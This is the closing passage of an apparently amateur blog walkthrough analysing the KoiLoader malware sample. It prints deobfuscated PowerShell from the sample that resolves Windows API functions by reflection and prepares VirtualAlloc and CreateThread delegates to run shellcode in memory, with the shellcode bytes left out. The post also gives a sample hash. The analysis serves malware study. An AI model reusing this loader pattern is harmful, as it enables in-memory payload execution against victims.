</span><span class="kr">Assembly</span><span class="w">           </span><span class="p">:</span><span class="w"> </span><span class="n">RD</span><span class="p">,</span><span class="w"> </span><span class="nx">Version</span><span class="o">=</span><span class="mf">0.0</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">0</span><span class="p">,</span><span class="w"> </span><span class="n">Culture</span><span class="o">=</span><span class="n">neutral</span><span class="p">,</span><span class="w"> </span><span class="nx">PublicKeyToken</span><span class="o">=</span><span class="n">null</span><span class="w">
</span><span class="nx">CustomAttributes</span><span class="w">   </span><span class="p">:</span><span class="w"> </span><span class="p">{}</span><span class="w">
</span><span class="n">ModuleHandle</span><span class="w">       </span><span class="p">:</span><span class="w"> </span><span class="nx">System.ModuleHandle</span><span class="w">
</span></pre></td></tr></tbody></table></code></div></div>
<p>I ran it also without the <code class="language-plaintext highlighter-rouge">$false</code> and the output didn’t change, or maybe it’s a hidden value of the assembly? I will have to go back to this, so far I ran it side by side with and without this parameter, and the output looks the same, but somehow it still is created under the same assembly name, even thou I used different one? Once I clear this session maybe it will become clear.
So far it defines an assembly module. #todo</p>

<h5 id="function-gpa"><span class="me-2">Function GPA</span><a href="#function-gpa" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>
<div class="language-powershell highlighter-rouge"><div class="code-header">
        <span data-label-text="Powershell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="nv">$SystemAssembly</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="n">AppDomain</span><span class="p">]::</span><span class="n">CurrentDomain.GetAssemblies</span><span class="p">()</span><span class="w"> </span><span class="o">|</span><span class="w">
    </span><span class="n">Where-Object</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="bp">$_</span><span class="o">.</span><span class="nf">GlobalAssemblyCache</span><span class="w"> </span><span class="o">-And</span><span class="w"> </span><span class="bp">$_</span><span class="o">.</span><span class="nf">Location</span><span class="o">.</span><span class="nf">Split</span><span class="p">(</span><span class="s1">'\\'</span><span class="p">)[</span><span class="nt">-1</span><span class="p">]</span><span class="o">.</span><span class="nf">Equals</span><span class="p">(</span><span class="s1">'System.dll'</span><span class="p">)</span><span class="w"> </span><span class="p">}</span><span class="w">
</span><span class="nv">$UnsafeNativeMethods</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$SystemAssembly</span><span class="o">.</span><span class="nf">GetType</span><span class="p">(</span><span class="s1">'Microsoft.Win32.UnsafeNativeMethods'</span><span class="p">)</span><span class="w">
</span><span class="nv">$GetModuleHandle</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$UnsafeNativeMethods</span><span class="o">.</span><span class="nf">GetMethod</span><span class="p">(</span><span class="s1">'GetModuleHandle'</span><span class="p">)</span><span class="w">
</span><span class="nv">$GetProcAddress</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$UnsafeNativeMethods</span><span class="o">.</span><span class="nf">GetMethod</span><span class="p">(</span><span class="s1">'GetProcAddress'</span><span class="p">,</span><span class="w"> </span><span class="p">[</span><span class="n">reflection.bindingflags</span><span class="p">]</span><span class="w"> </span><span class="s2">"Public,Static"</span><span class="p">,</span><span class="w"> </span><span class="bp">$null</span><span class="p">,</span><span class="w"> </span><span class="p">[</span><span class="n">System.Reflection.CallingConventions</span><span class="p">]::</span><span class="nx">Any</span><span class="p">,</span><span class="w"> </span><span class="p">@(</span><span class="err">(New-Object</span><span class="w"> </span><span class="err">System.Runtime.InteropServices.HandleRef</span><span class="p">)</span><span class="o">.</span><span class="nf">GetType</span><span class="p">(),</span><span class="w"> </span><span class="p">[</span><span class="n">string</span><span class="p">]),</span><span class="w"> </span><span class="bp">$null</span><span class="p">)</span><span class="w">
</span><span class="nv">$Kern32Handle</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$GetModuleHandle</span><span class="o">.</span><span class="nf">Invoke</span><span class="p">(</span><span class="bp">$null</span><span class="p">,</span><span class="w"> </span><span class="p">@(</span><span class="nv">$Module</span><span class="p">))</span><span class="w">
</span><span class="nv">$tmpPtr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">New-Object</span><span class="w"> </span><span class="nx">IntPtr</span><span class="w">
</span><span class="nv">$HandleRef</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">New-Object</span><span class="w"> </span><span class="nx">System.Runtime.InteropServices.HandleRef</span><span class="p">(</span><span class="nv">$tmpPtr</span><span class="p">,</span><span class="w"> </span><span class="nv">$Kern32Handle</span><span class="p">)</span><span class="w">
        
</span><span class="n">Write-Output</span><span class="w"> </span><span class="nv">$GetProcAddress</span><span class="o">.</span><span class="nf">Invoke</span><span class="p">(</span><span class="bp">$null</span><span class="p">,</span><span class="w"> </span><span class="p">@([</span><span class="n">System.Runtime.InteropServices.HandleRef</span><span class="p">]</span><span class="nv">$HandleRef</span><span class="p">,</span><span class="w"> </span><span class="nv">$Procedure</span><span class="p">))</span><span class="w">
</span></pre></td></tr></tbody></table></code></div></div>
<p>This one is more easier to understand for someone unfamiliar as me. 
As I can tell from it’s execution rather than create assumptions.</p>
<ol>
  <li><code class="language-plaintext highlighter-rouge">$SystemAssembly</code> returns path to System.dll.</li>
</ol>

<p>And boom while searching for explanation of <code class="language-plaintext highlighter-rouge">system.dll unsafenativemethods</code>, by accident I found similar code related to CobaltStrike beacon.
<a href="/imges/2025-08-01-KoiLoader/Pasted image 20250726192507.png" class="popup img-link shimmer"><img src="/imges/2025-08-01-KoiLoader/Pasted image 20250726192507.png" alt="Desktop View" loading="lazy"></a>
Source: https://medium.com/@polygonben/deobfuscating-a-powershell-cobalt-strike-beacon-loader-c650df862c34
The code is pretty much the same, or accomplishes the same task. It is slighlty changed, the structure, variables (obviously) but it’s mostly the same.
I’m still experimenting with how should I write this walkthrough, but I might adapt the way of explaining snippets of code as a comments under just like the Ben Folland, author of the article in link above.</p>

<p>Functions used in GPA are “official” I will try to explain them in my way as I understand them, but feel free to check the official documentation for clarification. I hope I won’t misinterpret anything or just don’t write it down wrong which would change how the function might work, but well I’m still learning ;D
However they might be slightly altered, or it’s just the obfuscated way of how are they written here.</p>
<ol>
  <li><code class="language-plaintext highlighter-rouge">$UnsafeNativeMethods</code> returns type of itself</li>
  <li><code class="language-plaintext highlighter-rouge">$GetModuleHandle</code> returns handle to specified process, the process has to be loaded in memory/address space of the calling process.</li>
  <li><code class="language-plaintext highlighter-rouge">$GetProcAddress</code> this one is easy, it returns address of the process :P However here as additional parameters</li>
  <li><code class="language-plaintext highlighter-rouge">$Kern32Handle</code></li>
</ol>

<div class="language-powershell highlighter-rouge"><div class="code-header">
        <span data-label-text="Powershell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td><td class="rouge-code"><pre><span class="nv">$marshal</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="n">System.Runtime.InteropServices.Marshal</span><span class="p">]</span><span class="w">

</span><span class="p">[</span><span class="n">Byte</span><span class="p">[]]</span><span class="nv">$sc</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="s1">'som hex values, probably code readable in ascii'</span><span class="p">]</span><span class="w">

</span><span class="nv">$VAAddr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GPA</span><span class="w"> </span><span class="nx">kernel32.dll</span><span class="w"> </span><span class="nx">VirtualAlloc</span><span class="w">
</span><span class="nv">$VADeleg</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GDT</span><span class="w"> </span><span class="p">@([</span><span class="n">IntPtr</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">UInt32</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">UInt32</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">UInt32</span><span class="p">])</span><span class="w"> </span><span class="p">([</span><span class="n">IntPtr</span><span class="p">])</span><span class="w">
</span><span class="nv">$CTAddr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GPA</span><span class="w"> </span><span class="nx">kernel32.dll</span><span class="w"> </span><span class="nx">CreateThread</span><span class="w">
</span><span class="nv">$CTDeleg</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GDT</span><span class="w"> </span><span class="p">@([</span><span class="n">IntPtr</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">UInt32</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">IntPtr</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">IntPtr</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">UInt32</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">IntPtr</span><span class="p">])</span><span class="w"> </span><span class="p">([</span><span class="n">IntPtr</span><span class="p">])</span><span class="w">
</span><span class="nv">$CT</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$marshal</span><span class="p">::</span><span class="n">GetDelegateForFunctionPointer</span><span class="p">(</span><span class="nv">$CTAddr</span><span class="p">,</span><span class="w"> </span><span class="nv">$CTDeleg</span><span class="p">)</span><span class="w">
</span><span class="nv">$WFSOAddr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GPA</span><span class="w"> </span><span class="nx">kernel32.dll</span><span class="w"> </span><span class="nx">WaitForSingleObject</span><span class="w">
</span><span class="nv">$WFSODeleg</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GDT</span><span class="w"> </span><span class="p">@([</span><span class="n">IntPtr</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">Int32</span><span class="p">])</span><span class="w"> </span><span class="p">([</span><span class="n">Int</span><span class="p">])</span><span class="w">
</span><span class="nv">$WFSO</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$marshal</span><span class="p">::</span><span class="n">GetDelegateForFunctionPointer</span><span class="p">(</span><span class="nv">$WFSOAddr</span><span class="p">,</span><span class="w"> </span><span class="nv">$WFSODeleg</span><span class="p">)</span><span class="w">

</span><span class="c">#System.Runtime.InteropServices.Marshal - it's a collection of methods for managing and interacting with memory </span><span class="w">
</span></pre></td></tr></tbody></table></code></div></div>
<p>Aaand as I was reading further I stumbled on this: https://github.com/PowerShellMafia/PowerSploit/issues/293
So the attackers are trying to inject <code class="language-plaintext highlighter-rouge">cummersMG.exe</code> into memory and exploit the victim machine.  So now I’m more curious what’s does the EXE file since the powershell script has been analyzed.</p>

<p>I tried to</p>

<h4 id="cummersmgexe"><span class="me-2">cummersMG.exe</span><a href="#cummersmgexe" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>sha256: D1F32BE6A9D1BFDC0489D06224B16D99AAA641D9E7DC6FAAD142BDE79EB09E1E</p>

<p>Compiler stamp: Tue May 20 04:31:15 2025 (UTC)</p>

<p><a href="/imges/2025-08-01-KoiLoader/Pasted image 20250801190121.png" class="popup img-link shimmer"><img src="/imges/2025-08-01-KoiLoader/Pasted image 20250801190121.png" alt="Desktop View" loading="lazy"></a></p>

<h3 id="revision-history"><span class="me-2">Revision History</span><a href="#revision-history" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<ul>
  <li><strong>2025-07-17</strong>: Initial threat acquisition and research.</li>
  <li><strong>2025-09-05</strong>: Posting draft version of post.</li>
</ul>

<h3 id="summary"><span class="me-2">Summary</span><a href="#summary" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:1">
      <p>An ActiveX object is an instance of a class that exposes properties, methods, and events to ActiveX clients. ActiveX objects support the COM. An ActiveX component is an application or library that is capable of creating one or more ActiveX objects. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;&#xfe0e;</a></p>
    </li>
    <li id="fn:2">
      <p><em>Reference assemblies</em><code class="language-plaintext highlighter-rouge">are a special type of assembly that contain only the minimum amount of metadata required to represent the library's public API surface. [...] enables developers to build programs that target a specific library version without having the full implementation assembly for that version.</code> <a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;&#xfe0e;</a></p>
    </li>
  </ol>
</div>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/malware/"
            class="post-tag no-text-decoration"
          >malware</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=KoiLoader%20-%20Malware%20Analysis%20Walkthrough%20-%20Qba01&url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2FKoiLoader%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.reddit.com/submit?url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2FKoiLoader%2F&title=KoiLoader%20-%20Malware%20Analysis%20Walkthrough%20-%20Qba01" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Reddit" aria-label="Reddit">
        <i class="fa-fw fa-brands fa-square-reddit"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/KoiLoader/">KoiLoader - Malware Analysis Walkthrough</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/DBatLoader/">DBatLoader - Malware Analysis Walkthrough</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/First-post/">First post</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/malware/">malware</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/dbatloader/">DBatLoader</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/dhl/">DHL</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/js/">JS</a>
      
    </div>
  </section>


            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  

  

  

  

  

  

  
    










  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/DBatLoader/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1752703200"
  data-df="ll"
  
>
  Jul 17, 2025
</time>

              <h4 class="pt-0 my-2">DBatLoader - Malware Analysis Walkthrough</h4>
              <div class="text-muted">
                <p>This is my “first” report/summary/walkthrough post, it’s very rough unpolished and with comments/notes of what I noted while I was working on the file. Still I wanted to post it so I can show snipp...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <a
      href="/posts/DBatLoader/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>DBatLoader - Malware Analysis Walkthrough</p>
    </a>
  

  
    <div class="btn btn-outline-primary disabled" aria-label="Newer">
      <p>-</p>
    </div>
  
</nav>

            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

    
      <a href="https://github.com/Qba01">Qba01</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.3.0"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/malware/">malware</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/dbatloader/">DBatLoader</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/dhl/">DHL</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/js/">JS</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{content}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

